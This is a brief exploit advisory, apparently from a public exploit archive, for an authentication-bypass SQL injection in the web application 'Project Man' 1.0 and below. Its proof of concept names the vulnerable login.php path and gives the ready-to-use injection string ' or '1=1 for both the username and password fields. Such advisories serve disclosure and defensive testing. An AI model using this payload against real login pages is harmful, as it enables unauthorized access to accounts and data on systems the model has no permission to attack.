Project Man versions 1.0 and below suffer a remote SQL injection vulnerability that allows for authentication bypass.
b2f033174768f059890956cd6939401e2d99c2d217062b2fc4a8c282459cda6b
##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
[Project Man_path]/login.php
Username: ' or '1=1
password: ' or '1=1
##############################################################